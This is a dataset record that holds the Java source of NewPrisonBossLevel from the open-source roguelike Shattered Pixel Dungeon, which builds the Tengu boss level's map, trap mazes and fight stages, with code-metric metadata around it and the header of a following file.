"qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/levels/NewPrisonBossLevel.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.levels;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Bones;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.blobs.Blob;
import com.shatteredpixel.shatteredpixeldungeon.actors.mobs.Mob;
import com.shatteredpixel.shatteredpixeldungeon.actors.mobs.NewTengu;
import com.shatteredpixel.shatteredpixeldungeon.effects.CellEmitter;
import com.shatteredpixel.shatteredpixeldungeon.effects.Speck;
import com.shatteredpixel.shatteredpixeldungeon.items.Heap;
import com.shatteredpixel.shatteredpixeldungeon.items.Item;
import com.shatteredpixel.shatteredpixeldungeon.items.keys.IronKey;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.missiles.HeavyBoomerang;
import com.shatteredpixel.shatteredpixeldungeon.levels.features.Maze;
import com.shatteredpixel.shatteredpixeldungeon.levels.painters.Painter;
import com.shatteredpixel.shatteredpixeldungeon.levels.traps.TenguDartTrap;
import com.shatteredpixel.shatteredpixeldungeon.levels.traps.Trap;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.plants.Plant;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.shatteredpixel.shatteredpixeldungeon.tiles.CustomTilemap;
import com.shatteredpixel.shatteredpixeldungeon.tiles.DungeonTilemap;
import com.shatteredpixel.shatteredpixeldungeon.ui.TargetHealthIndicator;
import com.shatteredpixel.shatteredpixeldungeon.utils.BArray;
import com.watabou.noosa.Camera;
import com.watabou.noosa.Group;
import com.watabou.noosa.Tilemap;
import com.watabou.noosa.audio.Sample;
import com.watabou.noosa.tweeners.AlphaTweener;
import com.watabou.utils.Bundlable;
import com.watabou.utils.Bundle;
import com.watabou.utils.PathFinder;
import com.watabou.utils.Point;
import com.watabou.utils.Random;
import com.watabou.utils.Rect;
import java.util.ArrayList;
public class NewPrisonBossLevel extends Level {
{
color1 = 0x6a723d;
color2 = 0x88924c;
//the player should be able to see all of Tengu's arena
viewDistance = 12;
}
public enum State {
START,
FIGHT_START,
TRAP_MAZES,
FIGHT_ARENA,
WON
}
private State state;
private NewTengu tengu;
public State state(){
return state;
}
@Override
public String tilesTex() {
return Assets.TILES_PRISON;
}
@Override
public String waterTex() {
return Assets.WATER_PRISON;
}
private static final String STATE = "state";
private static final String TENGU = "tengu";
private static final String STORED_ITEMS = "storeditems";
private static final String TRIGGERED = "triggered";
@Override
public void storeInBundle( Bundle bundle ) {
super.storeInBundle(bundle);
bundle.put( STATE, state );
bundle.put( TENGU, tengu );
bundle.put( STORED_ITEMS, storedItems);
bundle.put(TRIGGERED, triggered );
}
@Override
public void restoreFromBundle( Bundle bundle ) {
super.restoreFromBundle(bundle);
state = bundle.getEnum( STATE, State.class );
//in some states tengu won't be in the world, in others he will be.
if (state == State.START || state == State.TRAP_MAZES) {
tengu = (NewTengu)bundle.get( TENGU );
} else {
for (Mob mob : mobs){
if (mob instanceof NewTengu) {
tengu = (NewTengu) mob;
break;
}
}
}
for (Bundlable item : bundle.getCollection(STORED_ITEMS)){
storedItems.add( (Item)item );
}
triggered = bundle.getBooleanArray(TRIGGERED);
//compatibility with pre-0.7.5a saves
if (state == State.WON){
int cell = pointToCell(endStart);
int i = 0;
while (cell < length()){
System.arraycopy(endMap, i, map, cell, 14);
i += 14;
cell += width();
}
exit = pointToCell(levelExit);
}
}
@Override
protected boolean build() {
setSize(32, 32);
state = State.START;
setMapStart();
return true;
}
private static final int ENTRANCE_POS = 10 + 4*32;
private static final Rect entranceRoom = new Rect(8, 2, 13, 8);
private static final Rect startHallway = new Rect(9, 7, 12, 24);
private static final Rect[] startCells = new Rect[]{ new Rect(5, 9, 10, 16), new Rect(11, 9, 16, 16),
new Rect(5, 15, 10, 22), new Rect(11, 15, 16, 22)};
private static final Rect tenguCell = new Rect(6, 23, 15, 32);
private static final Point tenguCellCenter = new Point(10, 27);
private static final Point tenguCellDoor = new Point(10, 23);
private static final Point[] startTorches = new Point[]{ new Point(10, 2),
new Point(7, 9), new Point(13, 9),
new Point(7, 15), new Point(13, 15),
new Point(8, 23), new Point(12, 23)};
private void setMapStart(){
entrance = ENTRANCE_POS;
exit = 0;
Painter.fill(this, 0, 0, 32, 32, Terrain.WALL);
//Start
Painter.fill(this, entranceRoom, Terrain.WALL);
Painter.fill(this, entranceRoom, 1, Terrain.EMPTY);
Painter.set(this, entrance, Terrain.ENTRANCE);
Painter.fill(this, startHallway, Terrain.WALL);
Painter.fill(this, startHallway, 1, Terrain.EMPTY);
Painter.set(this, startHallway.left+1, startHallway.top, Terrain.DOOR);
for (Rect r : startCells){
Painter.fill(this, r, Terrain.WALL);
Painter.fill(this, r, 1, Terrain.EMPTY);
}
Painter.set(this, startHallway.left, startHallway.top+5, Terrain.DOOR);
Painter.set(this, startHallway.right-1, startHallway.top+5, Terrain.DOOR);
Painter.set(this, startHallway.left, startHallway.top+11, Terrain.DOOR);
Painter.set(this, startHallway.right-1, startHallway.top+11, Terrain.DOOR);
Painter.fill(this, tenguCell, Terrain.WALL);
Painter.fill(this, tenguCell, 1, Terrain.EMPTY);
Painter.set(this, tenguCell.left+4, tenguCell.top, Terrain.LOCKED_DOOR);
drop(new IronKey(10), randomPrisonCellPos());
for (Point p : startTorches){
Painter.set(this, p, Terrain.WALL_DECO);
}
}
private static final Rect mazeHallway = new Rect(9, 6, 12, 24);
private static final Rect[] mazeCells = new Rect[]{ new Rect(1, 9, 10, 16), new Rect(11, 9, 20, 16),
new Rect(3, 15, 10, 22), new Rect(11, 15, 18, 22)};
private static final Point[] mazeKeySpawns = new Point[]{new Point(mazeCells[0].left+1, mazeCells[0].top+3),
new Point(mazeCells[1].right-2, mazeCells[1].top+3),
new Point(mazeCells[2].left+1, mazeCells[2].top+3),
new Point(mazeCells[3].right-2, mazeCells[3].top+3)};
private static final Point[] mazeCellDoors = new Point[]{new Point(mazeCells[0].right-1, mazeCells[0].top+3),
new Point(mazeCells[1].left, mazeCells[1].top+3),
new Point(mazeCells[2].right-1, mazeCells[2].top+3),
new Point(mazeCells[3].left, mazeCells[3].top+3)};
private static final Point[] mazeTorches = new Point[]{ new Point(5, 9), new Point(15, 9),
new Point(6, 15), new Point(14, 15),
new Point(8, 23), new Point(12, 23)};
private void setMapMazes(){
exit = entrance = 0;
Painter.fill(this, 0, 0, 32, 32, Terrain.WALL);
Painter.fill(this, mazeHallway, Terrain.WALL);
Painter.fill(this, mazeHallway, 1, Terrain.EMPTY);
for (Rect r : mazeCells){
Painter.fill(this, r, Terrain.WALL);
Painter.fill(this, r, 1, Terrain.EMPTY);
}
for (Point p : mazeCellDoors){
Painter.set(this, p, Terrain.DOOR);
}
Painter.fill(this, tenguCell, Terrain.WALL);
Painter.fill(this, tenguCell, 1, Terrain.EMPTY);
Painter.set(this, tenguCell.left+4, tenguCell.top, Terrain.DOOR);
Painter.set(this, mazeHallway.left+1, mazeHallway.top+2, Terrain.LOCKED_DOOR);
Painter.set(this, mazeHallway.left+1, mazeHallway.top+4, Terrain.LOCKED_DOOR);
Painter.set(this, mazeHallway.left+1, mazeHallway.top+8, Terrain.LOCKED_DOOR);
Painter.set(this, mazeHallway.left+1, mazeHallway.top+10, Terrain.LOCKED_DOOR);
for (Point p : mazeKeySpawns){
drop(new IronKey(10), pointToCell(p));
}
for (Point p : mazeTorches){
Painter.set(this, p, Terrain.WALL_DECO);
}
}
private static final Rect arena = new Rect(3, 1, 18, 16);
private void setMapArena(){
exit = entrance = 0;
Painter.fill(this, 0, 0, 32, 32, Terrain.WALL);
Painter.fill(this, arena, Terrain.WALL);
Painter.fillEllipse(this, arena, 1, Terrain.EMPTY);
}
private static int W = Terrain.WALL;
private static int D = Terrain.WALL_DECO;
private static int e = Terrain.EMPTY;
private static int E = Terrain.EXIT;
private static int C = Terrain.CHASM;
private static final Point endStart = new Point( startHallway.left+2, startHallway.top+2);
private static final Point levelExit = new Point( endStart.x+12, endStart.y+6);
private static final int[] endMap = new int[]{
W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, e, e, e, e, e, W, W, W, W, W,
e, e, e, e, e, e, e, e, e, e, e, e, W, W,
e, e, e, e, e, e, e, e, e, e, e, e, e, W,
e, e, e, C, C, C, C, C, C, C, C, e, e, W,
e, W, C, C, C, C, C, C, C, C, C, E, E, W,
e, e, e, C, C, C, C, C, C, C, C, E, E, W,
e, e, e, e, e, C, C, C, C, C, C, E, E, W,
e, e, e, e, e, e, e, W, W, W, C, C, C, W,
W, e, e, e, e, e, W, W, W, W, C, C, C, W,
W, e, e, e, e, W, W, W, W, W, W, C, C, W,
W, W, W, W, W, W, W, W, W, W, W, C, C, W,
W, W, W, W, W, W, W, W, W, W, W, C, C, W,
W, D, W, W, W, W, W, W, W, W, W, C, C, W,
e, e, e, W, W, W, W, W, W, W, W, C, C, W,
e, e, e, W, W, W, W, W, W, W, W, C, C, W,
e, e, e, W, W, W, W, W, W, W, W, C, C, W,
e, e, e, W, W, W, W, W, W, W, W, C, C, W,
e, e, e, W, W, W, W, W, W, W, W, C, C, W,
e, e, e, W, W, W, W, W, W, W, W, C, C, W,
e, e, e, W, W, W, W, W, W, W, W, C, C, W,
W, W, W, W, W, W, W, W, W, W, W, C, C, W
};
private void setMapEnd(){
Painter.fill(this, 0, 0, 32, 32, Terrain.WALL);
setMapStart();
for (Heap h : heaps.valueList()){
if (h.peek() instanceof IronKey){
h.destroy();
}
}
CustomTilemap vis = new exitVisual();
vis.pos(11, 10);
customTiles.add(vis);
GameScene.add(vis, false);
vis = new exitVisualWalls();
vis.pos(11, 10);
customWalls.add(vis);
GameScene.add(vis, true);
Painter.set(this, tenguCell.left+4, tenguCell.top, Terrain.DOOR);
int cell = pointToCell(endStart);
int i = 0;
while (cell < length()){
System.arraycopy(endMap, i, map, cell, 14);
i += 14;
cell += width();
}
exit = pointToCell(levelExit);
}
//keep track of removed items as the level is changed. Dump them back into the level at the end.
private ArrayList<Item> storedItems = new ArrayList<>();
private void clearEntities(Rect safeArea){
for (Heap heap : heaps.valueList()){
if (safeArea == null || !safeArea.inside(cellToPoint(heap.pos))){
storedItems.addAll(heap.items);
heap.destroy();
}
}
for (HeavyBoomerang.CircleBack b : Dungeon.hero.buffs(HeavyBoomerang.CircleBack.class)){
if (safeArea == null || !safeArea.inside(cellToPoint(b.returnPos()))){
storedItems.add(b.cancel());
}
}
for (Mob mob : Dungeon.level.mobs.toArray(new Mob[0])){
if (mob != tengu && (safeArea == null || !safeArea.inside(cellToPoint(mob.pos)))){
mob.destroy();
if (mob.sprite != null)
mob.sprite.killAndErase();
}
}
for (Plant plant : plants.valueList()){
if (safeArea == null || !safeArea.inside(cellToPoint(plant.pos))){
plants.remove(plant.pos);
}
}
}
private void cleanMapState(){
buildFlagMaps();
cleanWalls();
BArray.setFalse(visited);
BArray.setFalse(mapped);
for (Blob blob: blobs.values()){
blob.fullyClear();
}
addVisuals(); //this also resets existing visuals
traps.clear();
GameScene.resetMap();
Dungeon.observe();
}
@Override
public Group addVisuals() {
super.addVisuals();
PrisonLevel.addPrisonVisuals(this, visuals);
return visuals;
}
public void progress(){
switch (state){
case START:
int tenguPos = pointToCell(tenguCellCenter);
//if something is occupying Tengu's space, try to put him in an adjacent cell
if (Actor.findChar(tenguPos) != null){
ArrayList<Integer> candidates = new ArrayList<>();
for (int i : PathFinder.NEIGHBOURS8){
if (Actor.findChar(tenguPos + i) == null){
candidates.add(tenguPos + i);
}
}
if (!candidates.isEmpty()){
tenguPos = Random.element(candidates);
//if there are no adjacent cells, wait and do nothing
} else {
return;
}
}
seal();
set(pointToCell(tenguCellDoor), Terrain.LOCKED_DOOR);
GameScene.updateMap(pointToCell(tenguCellDoor));
for (Mob m : mobs){
//bring the first ally with you
if (m.alignment == Char.Alignment.ALLY && !m.properties().contains(Char.Property.IMMOVABLE)){
m.pos = pointToCell(tenguCellDoor); //they should immediately walk out of the door
m.sprite.place(m.pos);
break;
}
}
tengu.state = tengu.HUNTING;
tengu.pos = tenguPos;
GameScene.add( tengu );
tengu.notice();
state = State.FIGHT_START;
break;
case FIGHT_START:
clearEntities( tenguCell ); //clear anything not in tengu's cell
Actor.remove(tengu);
mobs.remove(tengu);
TargetHealthIndicator.instance.target(null);
tengu.sprite.kill();
setMapMazes();
cleanMapState();
GameScene.flash(0xFFFFFF);
Sample.INSTANCE.play(Assets.SND_BLAST);
state = State.TRAP_MAZES;
break;
case TRAP_MAZES:
Dungeon.hero.interrupt();
clearEntities( arena ); //clear anything not in the arena
setMapArena();
cleanMapState();
tengu.state = tengu.HUNTING;
tengu.pos = (arena.left + arena.width()/2) + width()*(arena.top+2);
GameScene.add(tengu);
tengu.notice();
GameScene.flash(0xFFFFFF);
Sample.INSTANCE.play(Assets.SND_BLAST);
state = State.FIGHT_ARENA;
break;
case FIGHT_ARENA:
unseal();
Dungeon.hero.interrupt();
Dungeon.hero.pos = tenguCell.left+4 + (tenguCell.top+2)*width();
Dungeon.hero.sprite.interruptMotion();
Dungeon.hero.sprite.place(Dungeon.hero.pos);
Camera.main.snapTo(Dungeon.hero.sprite.center());
tengu.pos = pointToCell(tenguCellCenter);
tengu.sprite.place(tengu.pos);
//remove all mobs, but preserve allies
ArrayList<Mob> allies = new ArrayList<>();
for(Mob m : mobs.toArray(new Mob[0])){
if (m.alignment == Char.Alignment.ALLY && !m.properties().contains(Char.Property.IMMOVABLE)){
allies.add(m);
mobs.remove(m);
}
}
setMapEnd();
for (Mob m : allies){
do{
m.pos = randomTenguCellPos();
} while (findMob(m.pos) != null);
if (m.sprite != null) m.sprite.place(m.pos);
mobs.add(m);
}
tengu.die(Dungeon.hero);
clearEntities(tenguCell);
cleanMapState();
for (Item item : storedItems) {
if (!(item instanceof NewTengu.BombAbility.BombItem)
&& !(item instanceof NewTengu.ShockerAbility.ShockerItem)) {
drop(item, randomTenguCellPos());
}
}
GameScene.flash(0xFFFFFF);
Sample.INSTANCE.play(Assets.SND_BLAST);
state = State.WON;
break;
}
}
private boolean[] triggered = new boolean[]{false, false, false, false};
@Override
public void occupyCell(Char ch) {
super.occupyCell(ch);
if (ch == Dungeon.hero){
switch (state){
case START:
if (cellToPoint(ch.pos).y > tenguCell.top){
progress();
}
break;
case TRAP_MAZES:
for (int i = 0; i < mazeCellDoors.length; i++){
if (ch.pos == pointToCell(mazeCellDoors[i]) && !triggered[i]){
triggered[i] = true;
Maze.allowDiagonals = true;
boolean[][] maze;
boolean validMaze;
do {
maze = Maze.generate(mazeCells[i], map, width(), Terrain.WALL);
//prevents a maze that is just a straight line from the door
validMaze = false;
for (int x = 1; x < maze.length-1; x++){
if (maze[x][3]){
int cell = mazeCells[i].left+x + width()*(mazeCells[i].top+3);
if (heaps.get(cell) == null) {
validMaze = true;
break;
}
}
}
} while (!validMaze);
for (int x = 1; x < maze.length-1; x++) {
for (int y = 1; y < maze[0].length-1; y++) {
if (maze[x][y]){
int cell = mazeCells[i].left+x + width()*(mazeCells[i].top+y);
if (heaps.get(cell) == null){
setTrap(new TenguDartTrap().hide(), cell);
Painter.set(this, cell, Terrain.SECRET_TRAP);
CellEmitter.get(cell).burst(Speck.factory(Speck.LIGHT), 2);
}
}
}
}
FadingTraps f = new FadingTraps();
f.setCoveringArea(mazeCells[i]);
f.fadeDelay = 1f;
GameScene.add(f, false);
customTiles.add(f);
Sample.INSTANCE.play(Assets.SND_TELEPORT);
int roomCenter = (mazeCells[i].left + mazeCells[i].right)/2 +
(mazeCells[i].top + mazeCells[i].bottom)/2 * width();
Camera.main.panTo(DungeonTilemap.tileCenterToWorld(roomCenter), 5f);
Dungeon.hero.interrupt();
}
}
if (cellToPoint(ch.pos).y <= mazeHallway.top+2){
progress();
}
break;
}
}
}
@Override
protected void createMobs() {
tengu = new NewTengu(); //We want to keep track of tengu independently of other mobs, he's not always in the level.
}
public Actor respawner() {
return null;
}
@Override
protected void createItems() {
Item item = Bones.get();
if (item != null) {
drop( item, randomRespawnCell() ).setHauntedIfCursed(1f).type = Heap.Type.REMAINS;
}
}
private int randomPrisonCellPos(){
Rect room = startCells[Random.Int(startCells.length)];
return Random.IntRange(room.left+1, room.right-2)
+ width()*Random.IntRange(room.top+1, room.bottom-2);
}
public int randomTenguCellPos(){
return Random.IntRange(tenguCell.left+1, tenguCell.right-2)
+ width()*Random.IntRange(tenguCell.top+1, tenguCell.bottom-2);
}
public void cleanTenguCell(){
traps.clear();
Painter.fill(this, tenguCell, 1, Terrain.EMPTY);
buildFlagMaps();
}
public void placeTrapsInTenguCell(float fill){
Point tenguPoint = cellToPoint(tengu.pos);
Point heroPoint = cellToPoint(Dungeon.hero.pos);
PathFinder.setMapSize(7, 7);
int tenguPos = tenguPoint.x-(tenguCell.left+1) + (tenguPoint.y-(tenguCell.top+1))*7;
int heroPos = heroPoint.x-(tenguCell.left+1) + (heroPoint.y-(tenguCell.top+1))*7;
boolean[] trapsPatch;
do {
trapsPatch = Patch.generate(7, 7, fill, 0, false);
PathFinder.buildDistanceMap(tenguPos, BArray.not(trapsPatch, null));
} while (PathFinder.distance[heroPos] > 6);
PathFinder.setMapSize(width(), height());
for (int i = 0; i < trapsPatch.length; i++){
if (trapsPatch[i]) {
int x = i % 7;
int y = i / 7;
int cell = x+tenguCell.left+1 + (y+tenguCell.top+1)*width();
Level.set(cell, Terrain.SECRET_TRAP);
setTrap(new TenguDartTrap().hide(), cell);
CellEmitter.get(cell).burst(Speck.factory(Speck.LIGHT), 2);
} else {
}
}
GameScene.updateMap();
FadingTraps t = new FadingTraps();
t.fadeDelay = 1f;
t.setCoveringArea(tenguCell);
GameScene.add(t, false);
customTiles.add(t);
}
@Override
public int randomRespawnCell() {
int pos = ENTRANCE_POS; //random cell adjacent to the entrance.
int cell;
do {
cell = pos + PathFinder.NEIGHBOURS8[Random.Int(8)];
} while (!passable[cell] || Actor.findChar(cell) != null);
return cell;
}
@Override
public String tileName( int tile ) {
switch (tile) {
case Terrain.WATER:
return Messages.get(PrisonLevel.class, "water_name");
default:
return super.tileName( tile );
}
}
@Override
public String tileDesc(int tile) {
switch (tile) {
case Terrain.EMPTY_DECO:
return Messages.get(PrisonLevel.class, "empty_deco_desc");
case Terrain.BOOKSHELF:
return Messages.get(PrisonLevel.class, "bookshelf_desc");
default:
return super.tileDesc( tile );
}
}
//TODO consider making this external to the prison boss level
public static class FadingTraps extends CustomTilemap {
{
texture = Assets.TERRAIN_FEATURES;
}
Rect area;
private float fadeDuration = 1f;
private float initialAlpha = .4f;
private float fadeDelay = 0f;
public void setCoveringArea(Rect area){
tileX = area.left;
tileY = area.top;
tileH = area.bottom - area.top;
tileW = area.right - area.left;
this.area = area;
}
@Override
public Tilemap create() {
Tilemap v = super.create();
int[] data = new int[tileW*tileH];
int cell;
Trap t;
int i = 0;
for (int y = tileY; y < tileY + tileH; y++){
cell = tileX + y*Dungeon.level.width();
for (int x = tileX; x < tileX + tileW; x++){
t = Dungeon.level.traps.get(cell);
if (t != null){
data[i] = t.color + t.shape*16;
} else {
data[i] = -1;
}
cell++;
i++;
}
}
v.map( data, tileW );
setFade();
return v;
}
@Override
public String name(int tileX, int tileY) {
int cell = (this.tileX+tileX) + Dungeon.level.width()*(this.tileY+tileY);
if (Dungeon.level.traps.get(cell) != null){
return Messages.titleCase(Dungeon.level.traps.get(cell).name);
}
return super.name(tileX, tileY);
}
@Override
public String desc(int tileX, int tileY) {
int cell = (this.tileX+tileX) + Dungeon.level.width()*(this.tileY+tileY);
if (Dungeon.level.traps.get(cell) != null){
return Dungeon.level.traps.get(cell).desc();
}
return super.desc(tileX, tileY);
}
private void setFade( ){
if (vis == null){
return;
}
vis.alpha( initialAlpha );
Actor.addDelayed(new Actor() {
{
actPriority = HERO_PRIO-1;
}
@Override
protected boolean act() {
Actor.remove(this);
if (vis != null && vis.parent != null) {
Dungeon.level.customTiles.remove(FadingTraps.this);
vis.parent.add(new AlphaTweener(vis, 0f, fadeDuration) {
@Override
protected void onComplete() {
super.onComplete();
vis.killAndErase();
killAndErase();
}
});
}
return true;
}
}, fadeDelay);
}
}
public static class exitVisual extends CustomTilemap {
{
texture = Assets.PRISON_EXIT_NEW;
tileW = 14;
tileH = 11;
}
final int TEX_WIDTH = 256;
private static byte[] render = new byte[]{
0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0,
1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0,
1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0,
1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0,
1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0,
1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0,
1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0,
1, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0,
0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0,
0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0
};
@Override
public Tilemap create() {
Tilemap v = super.create();
int[] data = mapSimpleImage(0, 0, TEX_WIDTH);
for (int i = 0; i < data.length; i++){
if (render[i] == 0) data[i] = -1;
}
v.map(data, tileW);
return v;
}
@Override
public void restoreFromBundle(Bundle bundle) {
super.restoreFromBundle(bundle);
tileX = 11;
tileY = 10;
tileW = 14;
tileH = 11;
}
}
public static class exitVisualWalls extends CustomTilemap {
{
texture = Assets.PRISON_EXIT_NEW;
tileW = 14;
tileH = 22;
}
final int TEX_WIDTH = 256;
private static byte[] render = new byte[]{
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1,
0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1,
1, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1,
0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1,
0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 1,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1
};
@Override
public Tilemap create() {
Tilemap v = super.create();
int[] data = mapSimpleImage(0, 10, TEX_WIDTH);
for (int i = 0; i < data.length; i++){
if (render[i] == 0) data[i] = -1;
}
v.map(data, tileW);
return v;
}
@Override
public void restoreFromBundle(Bundle bundle) {
super.restoreFromBundle(bundle);
tileX = 11;
tileY = 10;
tileW = 14;
tileH = 22;
}
}
}
| 26,750 | NewPrisonBossLevel | java | en | java | code | {"qsc_code_num_words": 3692, "qsc_code_num_chars": 26750.0, "qsc_code_mean_word_length": 4.38488624, "qsc_code_frac_words_unique": 0.13488624, "qsc_code_frac_chars_top_2grams": 0.03298536, "qsc_code_frac_chars_top_3grams": 0.03910062, "qsc_code_frac_chars_top_4grams": 0.0437334, "qsc_code_frac_chars_dupe_5grams": 0.40002471, "qsc_code_frac_chars_dupe_6grams": 0.30650442, "qsc_code_frac_chars_dupe_7grams": 0.2663537, "qsc_code_frac_chars_dupe_8grams": 0.2530113, "qsc_code_frac_chars_dupe_9grams": 0.23991599, "qsc_code_frac_chars_dupe_10grams": 0.21069862, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.04266389, "qsc_code_frac_chars_whitespace": 0.24557009, "qsc_code_size_file_byte": 26750.0, "qsc_code_num_lines": 921.0, "qsc_code_num_chars_line_max": 118.0, "qsc_code_num_chars_line_mean": 29.04451683, "qsc_code_frac_chars_alphabet": 0.75952629, "qsc_code_frac_chars_comments": 0.06138318, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.28094576, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00274813, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00159312, "qsc_code_frac_lines_prompt_comments": 0.00108578, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.06815021, "qsc_codejava_score_lines_no_logic": 0.14603616, "qsc_codejava_frac_words_no_modifier": 0.72, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/levels/CavesBossLevel.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
